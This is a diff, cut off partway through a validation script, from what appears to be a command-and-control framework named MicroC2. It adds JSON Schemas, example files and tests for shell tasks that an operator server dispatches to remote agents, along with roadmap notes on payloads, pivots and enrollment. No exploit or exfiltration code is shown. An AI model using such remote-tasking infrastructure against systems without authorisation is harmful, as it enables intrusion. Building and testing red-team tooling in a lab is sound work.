-4. Fix #64 so listener, payload/build, and runtime agent identities are
-   separate.
-5. Tackle #88 to make agent tasking, files, and pivots coherent.
+1. Finish #98 so shell tasking uses the versioned, retry-safe typed task/result
+   contract end to end.
+2. Complete #104 before any promotion beyond an isolated lab, binding agent
+   tasking to authenticated enrollment sessions.
+3. Build #97 on the typed contract so agents, task lifecycles, results, payload
+   metadata, and listener events survive restart.
+4. Add #100 on the durable model so operator and agent actions have causal,
+   reviewable audit events.
+5. Tackle #88 after #98, adding file transfer and pivot operations as explicit
+   task types instead of new string commands.
 
-This order keeps momentum while preventing the framework from accumulating more
-prototype debt.
+The data path is **#98 → #97 → #100**. Issue #104 is a parallel P0 security
+gate before promotion, and #99 remains a bounded P1 payload-quality track that
+can proceed alongside it.

--- a/docs/schemas/examples/task-create-request-v1.json
+++ b/docs/schemas/examples/task-create-request-v1.json
@@ -1,0 +1,9 @@
+{
+  "schema_version": 1,
+  "type": "shell",
+  "arguments": {
+    "command": "whoami"
+  },
+  "timeout_seconds": 30,
+  "expires_in_seconds": 300
+}

--- a/docs/schemas/examples/task-dispatched-v1.json
+++ b/docs/schemas/examples/task-dispatched-v1.json
@@ -1,0 +1,15 @@
+{
+  "schema_version": 1,
+  "id": "task-018f8dab",
+  "agent_id": "agent-01",
+  "type": "shell",
+  "arguments": {
+    "command": "whoami"
+  },
+  "timeout_seconds": 30,
+  "status": "dispatched",
+  "created_at": "2026-07-23T16:30:00Z",
+  "queued_at": "2026-07-23T16:30:00Z",
+  "dispatched_at": "2026-07-23T16:30:01Z",
+  "expires_at": "2026-07-23T16:35:00Z"
+}

--- a/docs/schemas/examples/task-page-v1.json
+++ b/docs/schemas/examples/task-page-v1.json
@@ -1,0 +1,35 @@
+{
+  "schema_version": 1,
+  "tasks": [
+    {
+      "schema_version": 1,
+      "id": "task-018f8dab",
+      "agent_id": "agent-01",
+      "type": "shell",
+      "arguments": {
+        "command": "whoami"
+      },
+      "timeout_seconds": 30,
+      "status": "completed",
+      "created_at": "2026-07-23T16:30:00Z",
+      "queued_at": "2026-07-23T16:30:00Z",
+      "dispatched_at": "2026-07-23T16:30:01Z",
+      "started_at": "2026-07-23T16:30:05Z",
+      "completed_at": "2026-07-23T16:30:06Z",
+      "expires_at": "2026-07-23T16:35:00Z",
+      "result": {
+        "schema_version": 1,
+        "task_id": "task-018f8dab",
+        "agent_id": "agent-01",
+        "outcome": "completed",
+        "started_at": "2026-07-23T16:30:05Z",
+        "completed_at": "2026-07-23T16:30:06Z",
+        "exit_code": 0
+      }
+    }
+  ],
+  "limit": 50,
+  "offset": 0,
+  "total": 1,
+  "next_offset": null
+}

--- a/docs/schemas/examples/task-result-failed-v1.json
+++ b/docs/schemas/examples/task-result-failed-v1.json
@@ -1,0 +1,14 @@
+{
+  "schema_version": 1,
+  "task_id": "task-018f8dab",
+  "agent_id": "agent-01",
+  "outcome": "failed",
+  "started_at": "2026-07-23T16:30:05Z",
+  "completed_at": "2026-07-23T16:30:06Z",
+  "exit_code": 0,
+  "output": {
+    "stdout": "",
+    "stderr": ""
+  },
+  "error": "stdout capture exceeded the result limit"
+}

--- a/docs/schemas/examples/task-result-v1.json
+++ b/docs/schemas/examples/task-result-v1.json
@@ -1,0 +1,13 @@
+{
+  "schema_version": 1,
+  "task_id": "task-018f8dab",
+  "agent_id": "agent-01",
+  "outcome": "completed",
+  "started_at": "2026-07-23T16:30:05Z",
+  "completed_at": "2026-07-23T16:30:06Z",
+  "exit_code": 0,
+  "output": {
+    "stdout": "lab-user\n",
+    "stderr": ""
+  }
+}

--- a/docs/schemas/examples/task-status-update-v1.json
+++ b/docs/schemas/examples/task-status-update-v1.json
@@ -1,0 +1,7 @@
+{
+  "schema_version": 1,
+  "task_id": "task-018f8dab",
+  "agent_id": "agent-01",
+  "status": "running",
+  "timestamp": "2026-07-23T16:30:05Z"
+}

--- a/docs/schemas/examples/task-v1.json
+++ b/docs/schemas/examples/task-v1.json
@@ -1,0 +1,14 @@
+{
+  "schema_version": 1,
+  "id": "task-018f8dab",
+  "agent_id": "agent-01",
+  "type": "shell",
+  "arguments": {
+    "command": "whoami"
+  },
+  "timeout_seconds": 30,
+  "status": "queued",
+  "created_at": "2026-07-23T16:30:00Z",
+  "queued_at": "2026-07-23T16:30:00Z",
+  "expires_at": "2026-07-23T16:35:00Z"
+}

--- a/docs/schemas/task-create-request-v1.schema.json
+++ b/docs/schemas/task-create-request-v1.schema.json
@@ -1,0 +1,49 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-create-request-v1.schema.json",
+  "title": "MicroC2 Task Create Request v1",
+  "description": "Canonical operator request for creating a versioned shell task.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "type",
+    "arguments",
+    "timeout_seconds",
+    "expires_in_seconds"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "type": {
+      "const": "shell"
+    },
+    "arguments": {
+      "type": "object",
+      "additionalProperties": false,
+      "required": [
+        "command"
+      ],
+      "properties": {
+        "command": {
+          "type": "string",
+          "minLength": 1,
+          "maxLength": 8192,
+          "pattern": "\\S"
+        }
+      }
+    },
+    "timeout_seconds": {
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 3600
+    },
+    "expires_in_seconds": {
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 604800,
+      "description": "Seconds from server acceptance until the latest authorized start time."
+    }
+  }
+}

--- a/docs/schemas/task-page-v1.schema.json
+++ b/docs/schemas/task-page-v1.schema.json
@@ -1,0 +1,48 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-page-v1.schema.json",
+  "title": "MicroC2 Task Page v1",
+  "description": "Bounded, newest-first page of operator task summaries.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "tasks",
+    "limit",
+    "offset",
+    "total",
+    "next_offset"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "tasks": {
+      "type": "array",
+      "maxItems": 100,
+      "items": {
+        "$ref": "task-summary-v1.schema.json"
+      }
+    },
+    "limit": {
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 100
+    },
+    "offset": {
+      "type": "integer",
+      "minimum": 0
+    },
+    "total": {
+      "type": "integer",
+      "minimum": 0
+    },
+    "next_offset": {
+      "type": [
+        "integer",
+        "null"
+      ],
+      "minimum": 0
+    }
+  }
+}

--- a/docs/schemas/task-result-summary-v1.schema.json
+++ b/docs/schemas/task-result-summary-v1.schema.json
@@ -1,0 +1,113 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-result-summary-v1.schema.json",
+  "title": "MicroC2 Task Result Summary v1",
+  "description": "Terminal result metadata returned in paginated operator task lists. Full stdout and stderr are available only from the individual task resource.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "task_id",
+    "agent_id",
+    "outcome",
+    "started_at",
+    "completed_at"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "task_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "agent_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "outcome": {
+      "enum": [
+        "completed",
+        "failed"
+      ]
+    },
+    "started_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Non-zero RFC3339 execution start instant."
+    },
+    "completed_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Non-zero RFC3339 completion instant that must not precede started_at."
+    },
+    "exit_code": {
+      "type": [
+        "integer",
+        "null"
+      ],
+      "minimum": -2147483648,
+      "maximum": 2147483647
+    },
+    "error": {
+      "type": "string",
+      "maxLength": 8192
+    }
+  },
+  "allOf": [
+    {
+      "if": {
+        "properties": {
+          "outcome": {
+            "const": "completed"
+          }
+        },
+        "required": [
+          "outcome"
+        ]
+      },
+      "then": {
+        "properties": {
+          "exit_code": {
+            "const": 0
+          },
+          "error": false
+        },
+        "required": [
+          "exit_code"
+        ]
+      }
+    },
+    {
+      "if": {
+        "properties": {
+          "outcome": {
+            "const": "failed"
+          }
+        },
+        "required": [
+          "outcome"
+        ]
+      },
+      "then": {
+        "properties": {
+          "error": {
+            "type": "string",
+            "minLength": 1,
+            "maxLength": 8192,
+            "pattern": "\\S"
+          }
+        },
+        "required": [
+          "error"
+        ]
+      }
+    }
+  ]
+}

--- a/docs/schemas/task-result-v1.schema.json
+++ b/docs/schemas/task-result-v1.schema.json
@@ -1,0 +1,132 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-result-v1.schema.json",
+  "title": "MicroC2 Task Result v1",
+  "description": "Terminal result submitted by an agent for a correlated task.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "task_id",
+    "agent_id",
+    "outcome",
+    "started_at",
+    "completed_at",
+    "output"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "task_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "agent_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "outcome": {
+      "enum": [
+        "completed",
+        "failed"
+      ]
+    },
+    "started_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Non-zero RFC3339 execution start instant."
+    },
+    "completed_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Non-zero RFC3339 completion instant that must not precede started_at."
+    },
+    "exit_code": {
+      "type": [
+        "integer",
+        "null"
+      ],
+      "minimum": -2147483648,
+      "maximum": 2147483647
+    },
+    "output": {
+      "type": "object",
+      "additionalProperties": false,
+      "required": [
+        "stdout",
+        "stderr"
+      ],
+      "properties": {
+        "stdout": {
+          "type": "string",
+          "maxLength": 1048576
+        },
+        "stderr": {
+          "type": "string",
+          "maxLength": 1048576
+        }
+      }
+    },
+    "error": {
+      "type": "string",
+      "maxLength": 8192
+    }
+  },
+  "allOf": [
+    {
+      "if": {
+        "properties": {
+          "outcome": {
+            "const": "completed"
+          }
+        },
+        "required": [
+          "outcome"
+        ]
+      },
+      "then": {
+        "properties": {
+          "exit_code": {
+            "const": 0
+          },
+          "error": false
+        },
+        "required": [
+          "exit_code"
+        ]
+      }
+    },
+    {
+      "if": {
+        "properties": {
+          "outcome": {
+            "const": "failed"
+          }
+        },
+        "required": [
+          "outcome"
+        ]
+      },
+      "then": {
+        "properties": {
+          "error": {
+            "type": "string",
+            "minLength": 1,
+            "maxLength": 8192,
+            "pattern": "\\S"
+          }
+        },
+        "required": [
+          "error"
+        ]
+      }
+    }
+  ]
+}

--- a/docs/schemas/task-status-update-v1.schema.json
+++ b/docs/schemas/task-status-update-v1.schema.json
@@ -1,0 +1,41 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-status-update-v1.schema.json",
+  "title": "MicroC2 Task Status Update v1",
+  "description": "Agent acknowledgement that a dispatched task has started running.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "task_id",
+    "agent_id",
+    "status",
+    "timestamp"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "task_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "agent_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "status": {
+      "const": "running"
+    },
+    "timestamp": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Non-zero RFC3339 instant at which the agent began execution."
+    }
+  }
+}

--- a/docs/schemas/task-summary-v1.schema.json
+++ b/docs/schemas/task-summary-v1.schema.json
@@ -1,0 +1,237 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-summary-v1.schema.json",
+  "title": "MicroC2 Task Summary v1",
+  "description": "Bounded operator-list representation of a task. Terminal output streams are intentionally omitted and are retrieved from the individual Task v1 resource.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "id",
+    "agent_id",
+    "type",
+    "arguments",
+    "timeout_seconds",
+    "status",
+    "created_at",
+    "queued_at",
+    "expires_at"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "agent_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "type": {
+      "const": "shell"
+    },
+    "arguments": {
+      "type": "object",
+      "additionalProperties": false,
+      "required": [
+        "command"
+      ],
+      "properties": {
+        "command": {
+          "type": "string",
+          "minLength": 1,
+          "maxLength": 8192,
+          "pattern": "\\S"
+        }
+      }
+    },
+    "timeout_seconds": {
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 3600
+    },
+    "status": {
+      "enum": [
+        "queued",
+        "dispatched",
+        "running",
+        "completed",
+        "failed",
+        "cancelled",
+        "expired"
+      ]
+    },
+    "created_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "queued_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "dispatched_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "started_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "completed_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "expires_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "result": {
+      "$ref": "task-result-summary-v1.schema.json"
+    }
+  },
+  "oneOf": [
+    {
+      "properties": {
+        "status": {
+          "const": "queued"
+        },
+        "dispatched_at": false,
+        "started_at": false,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "dispatched"
+        },
+        "dispatched_at": true,
+        "started_at": false,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status",
+        "dispatched_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "running"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "completed"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": true,
+        "result": {
+          "type": "object",
+          "properties": {
+            "outcome": {
+              "const": "completed"
+            }
+          },
+          "required": [
+            "outcome"
+          ]
+        }
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at",
+        "completed_at",
+        "result"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "failed"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": true,
+        "result": {
+          "type": "object",
+          "properties": {
+            "outcome": {
+              "const": "failed"
+            }
+          },
+          "required": [
+            "outcome"
+          ]
+        }
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at",
+        "completed_at",
+        "result"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "cancelled"
+        },
+        "dispatched_at": false,
+        "started_at": false,
+        "completed_at": true,
+        "result": false
+      },
+      "required": [
+        "status",
+        "completed_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "expired"
+        },
+        "dispatched_at": true,
+        "started_at": false,
+        "completed_at": true,
+        "result": false
+      },
+      "required": [
+        "status",
+        "completed_at"
+      ]
+    }
+  ]
+}

--- a/docs/schemas/task-v1.schema.json
+++ b/docs/schemas/task-v1.schema.json
@@ -1,0 +1,238 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://microc2.local/schemas/task-v1.schema.json",
+  "title": "MicroC2 Task v1",
+  "description": "Versioned task envelope exchanged between the operator server and an agent. expires_at is the latest server-authorized time at which execution may start.",
+  "type": "object",
+  "additionalProperties": false,
+  "required": [
+    "schema_version",
+    "id",
+    "agent_id",
+    "type",
+    "arguments",
+    "timeout_seconds",
+    "status",
+    "created_at",
+    "queued_at",
+    "expires_at"
+  ],
+  "properties": {
+    "schema_version": {
+      "const": 1
+    },
+    "id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "agent_id": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 128,
+      "pattern": "^[A-Za-z0-9_.:-]+$"
+    },
+    "type": {
+      "const": "shell"
+    },
+    "arguments": {
+      "type": "object",
+      "additionalProperties": false,
+      "required": [
+        "command"
+      ],
+      "properties": {
+        "command": {
+          "type": "string",
+          "minLength": 1,
+          "maxLength": 8192,
+          "pattern": "\\S"
+        }
+      }
+    },
+    "timeout_seconds": {
+      "type": "integer",
+      "minimum": 1,
+      "maximum": 3600
+    },
+    "status": {
+      "enum": [
+        "queued",
+        "dispatched",
+        "running",
+        "completed",
+        "failed",
+        "cancelled",
+        "expired"
+      ]
+    },
+    "created_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "queued_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "dispatched_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "started_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "completed_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35
+    },
+    "expires_at": {
+      "type": "string",
+      "format": "date-time",
+      "maxLength": 35,
+      "description": "Latest server-authorized start time. A task that has not started by this instant must not execute."
+    },
+    "result": {
+      "$ref": "task-result-v1.schema.json"
+    }
+  },
+  "oneOf": [
+    {
+      "properties": {
+        "status": {
+          "const": "queued"
+        },
+        "dispatched_at": false,
+        "started_at": false,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "dispatched"
+        },
+        "dispatched_at": true,
+        "started_at": false,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status",
+        "dispatched_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "running"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": false,
+        "result": false
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "completed"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": true,
+        "result": {
+          "type": "object",
+          "properties": {
+            "outcome": {
+              "const": "completed"
+            }
+          },
+          "required": [
+            "outcome"
+          ]
+        }
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at",
+        "completed_at",
+        "result"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "failed"
+        },
+        "dispatched_at": true,
+        "started_at": true,
+        "completed_at": true,
+        "result": {
+          "type": "object",
+          "properties": {
+            "outcome": {
+              "const": "failed"
+            }
+          },
+          "required": [
+            "outcome"
+          ]
+        }
+      },
+      "required": [
+        "status",
+        "dispatched_at",
+        "started_at",
+        "completed_at",
+        "result"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "cancelled"
+        },
+        "dispatched_at": false,
+        "started_at": false,
+        "completed_at": true,
+        "result": false
+      },
+      "required": [
+        "status",
+        "completed_at"
+      ]
+    },
+    {
+      "properties": {
+        "status": {
+          "const": "expired"
+        },
+        "dispatched_at": true,
+        "started_at": false,
+        "completed_at": true,
+        "result": false
+      },
+      "required": [
+        "status",
+        "completed_at"
+      ]
+    }
+  ]
+}

--- a/docs/schemas/validate-examples.js
+++ b/docs/schemas/validate-examples.js
@@ -1,0 +1,528 @@
+'use strict';
+
+const fs = require('node:fs');
+const path = require('node:path');
+const Ajv2020 = require('ajv/dist/2020');
+const addFormats = require('ajv-formats');
+
+const schemaDirectory = __dirname;
+const exampleDirectory = path.join(schemaDirectory, 'examples');
+const ajv = new Ajv2020({
+    allErrors: true,
+    strict: true
+});
+addFormats(ajv);
+
+const schemaFiles = fs.readdirSync(schemaDirectory)
+    .filter(file => file.endsWith('.schema.json'))
+    .sort();
+
+for (const file of schemaFiles) {
+    const schema = readJSON(path.join(schemaDirectory, file));
+    ajv.addSchema(schema);
+}
+
+const exampleSchemas = new Map([
+    ['task-create-request-v1.json', 'task-create-request-v1.schema.json'],
+    ['task-dispatched-v1.json', 'task-v1.schema.json'],
+    ['task-page-v1.json', 'task-page-v1.schema.json'],
+    ['task-result-failed-v1.json', 'task-result-v1.schema.json'],
+    ['task-result-v1.json', 'task-result-v1.schema.json'],
+    ['task-status-update-v1.json', 'task-status-update-v1.schema.json'],
+    ['task-v1.json', 'task-v1.schema.json']
+]);
+
+let failed = false;
+const exampleFiles = fs.readdirSync(exampleDirectory)
+    .filter(file => file.endsWith('.json'))
+    .sort();
+
+for (const file of exampleFiles) {
+    const schemaFile = exampleSchemas.get(file);
+    if (!schemaFile) {
+        console.error(`No schema mapping is defined for ${file}`);
+        failed = true;
+        continue;
+    }
+
+    const validate = ajv.getSchema(schemaID(schemaFile));
+    if (!validate) {
+        console.error(`Schema ${schemaFile} was not loaded for ${file}`);
+        failed = true;
+        continue;
+    }
+
+    const example = readJSON(path.join(exampleDirectory, file));
+    if (!validate(example)) {
+        console.error(`${file} does not satisfy ${schemaFile}:`);
+        console.error(ajv.errorsText(validate.errors, {separator: '\n'}));
+        failed = true;
+    }
+}
+
+for (const file of exampleSchemas.keys()) {
+    if (!exampleFiles.includes(file)) {
+        console.error(`Expected contract example is missing: ${file}`);
+        failed = true;
+    }
+}
+
+const queuedTask = readJSON(path.join(exampleDirectory, 'task-v1.json'));
+const dispatchedTask = readJSON(path.join(exampleDirectory, 'task-dispatched-v1.json'));
+const completedResult = readJSON(path.join(exampleDirectory, 'task-result-v1.json'));
+const failedResult = readJSON(path.join(exampleDirectory, 'task-result-failed-v1.json'));
+const runningStatusUpdate = readJSON(
+    path.join(exampleDirectory, 'task-status-update-v1.json')
+);
+const runningTask = {
+    ...dispatchedTask,
+    status: 'running',
+    started_at: completedResult.started_at
+};
+const completedTask = {
+    ...runningTask,
+    status: 'completed',
+    completed_at: completedResult.completed_at,
+    result: completedResult
+};
+const failedTask = {
+    ...runningTask,
+    status: 'failed',
+    completed_at: failedResult.completed_at,
+    result: failedResult
+};
+const cancelledTask = {
+    ...queuedTask,
+    status: 'cancelled',
+    completed_at: '2026-07-23T16:30:01Z'
+};
+const expiredQueuedTask = {
+    ...queuedTask,
+    status: 'expired',
+    completed_at: queuedTask.expires_at
+};
+const expiredDispatchedTask = {
+    ...dispatchedTask,
+    status: 'expired',
+    completed_at: dispatchedTask.expires_at
+};
+
+const lifecyclePositiveCases = [
+    {name: 'running task', value: runningTask},
+    {name: 'completed task', value: completedTask},
+    {name: 'failed task', value: failedTask},
+    {name: 'cancelled task', value: cancelledTask},
+    {name: 'queued task expiry', value: expiredQueuedTask},
+    {name: 'dispatched task expiry retains dispatched_at', value: expiredDispatchedTask}
+];
+
+for (const testCase of lifecyclePositiveCases) {
+    const validate = ajv.getSchema(schemaID('task-v1.schema.json'));
+    if (!validate || !validate(testCase.value)) {
+        console.error(`Schema contract failed lifecycle case: ${testCase.name}`);
+        if (validate) {
+            console.error(ajv.errorsText(validate.errors, {separator: '\n'}));
+        }
+        failed = true;
+    }
+}
+
+const negativeCases = [
+    {
+        name: 'create request rejects a blank command',
+        schema: 'task-create-request-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-create-request-v1.json')),
+            arguments: {command: '   '}
+        }
+    },
+    {
+        name: 'create request rejects an oversized command',
+        schema: 'task-create-request-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-create-request-v1.json')),
+            arguments: {command: 'x'.repeat(8193)}
+        }
+    },
+    {
+        name: 'create request rejects unknown fields',
+        schema: 'task-create-request-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-create-request-v1.json')),
+            future_option: true
+        }
+    },
+    {
+        name: 'status update rejects a non-ASCII-safe task id',
+        schema: 'task-status-update-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-status-update-v1.json')),
+            task_id: 'task/one'
+        }
+    },
+    {
+        name: 'result rejects an oversized agent id',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            agent_id: 'a'.repeat(129)
+        }
+    },
+    {
+        name: 'result rejects an overlong RFC3339 timestamp',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            started_at: '2026-07-23T16:30:05.12345678901234567890Z'
+        }
+    },
+    {
+        name: 'result rejects oversized stdout',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            output: {
+                stdout: 'x'.repeat(1048577),
+                stderr: ''
+            }
+        }
+    },
+    {
+        name: 'result rejects an oversized error',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            error: 'x'.repeat(8193)
+        }
+    },
+    {
+        name: 'completed result requires exit code zero',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            exit_code: 1
+        }
+    },
+    {
+        name: 'result rejects an exit code above signed 32-bit range',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-failed-v1.json')),
+            exit_code: 2147483648
+        }
+    },
+    {
+        name: 'completed result forbids error',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            error: 'unexpected failure'
+        }
+    },
+    {
+        name: 'completed result forbids an explicitly empty error',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-v1.json')),
+            error: ''
+        }
+    },
+    {
+        name: 'failed result requires error',
+        schema: 'task-result-v1.schema.json',
+        value: withoutProperty(
+            readJSON(path.join(exampleDirectory, 'task-result-failed-v1.json')),
+            'error'
+        )
+    },
+    {
+        name: 'failed result rejects a blank error',
+        schema: 'task-result-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-result-failed-v1.json')),
+            error: ' \t '
+        }
+    },
+    {
+        name: 'task requires expires_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(
+            readJSON(path.join(exampleDirectory, 'task-v1.json')),
+            'expires_at'
+        )
+    },
+    {
+        name: 'task rejects a blank command',
+        schema: 'task-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-v1.json')),
+            arguments: {command: '\t'}
+        }
+    },
+    {
+        name: 'dispatched task requires dispatched_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(
+            readJSON(path.join(exampleDirectory, 'task-dispatched-v1.json')),
+            'dispatched_at'
+        )
+    },
+    {
+        name: 'running task requires dispatched_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(runningTask, 'dispatched_at')
+    },
+    {
+        name: 'running task requires started_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(runningTask, 'started_at')
+    },
+    {
+        name: 'completed task requires result',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(completedTask, 'result')
+    },
+    {
+        name: 'failed task requires completed_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(failedTask, 'completed_at')
+    },
+    {
+        name: 'completed task result outcome matches status',
+        schema: 'task-v1.schema.json',
+        value: {
+            ...completedTask,
+            result: failedResult
+        }
+    },
+    {
+        name: 'failed task result outcome matches status',
+        schema: 'task-v1.schema.json',
+        value: {
+            ...failedTask,
+            result: completedResult
+        }
+    },
+    {
+        name: 'cancelled task requires completed_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(cancelledTask, 'completed_at')
+    },
+    {
+        name: 'expired task requires completed_at',
+        schema: 'task-v1.schema.json',
+        value: withoutProperty(expiredDispatchedTask, 'completed_at')
+    },
+    {
+        name: 'task page rejects full output in a summary',
+        schema: 'task-page-v1.schema.json',
+        value: taskPageWithResultOutput()
+    },
+    {
+        name: 'task page rejects more than 100 summaries',
+        schema: 'task-page-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-page-v1.json')),
+            tasks: Array.from(
+                {length: 101},
+                () => readJSON(path.join(exampleDirectory, 'task-page-v1.json')).tasks[0]
+            )
+        }
+    },
+    {
+        name: 'task page rejects a negative offset',
+        schema: 'task-page-v1.schema.json',
+        value: {
+            ...readJSON(path.join(exampleDirectory, 'task-page-v1.json')),
+            offset: -1
+        }
+    },
+    ...forbiddenStateCases(
+        'queued',
+        queuedTask,
+        ['dispatched_at', 'started_at', 'completed_at', 'result']
+    ),
+    ...forbiddenStateCases(
+        'dispatched',
+        dispatchedTask,
+        ['started_at', 'completed_at', 'result']
+    ),
+    ...forbiddenStateCases(
+        'running',
+        runningTask,
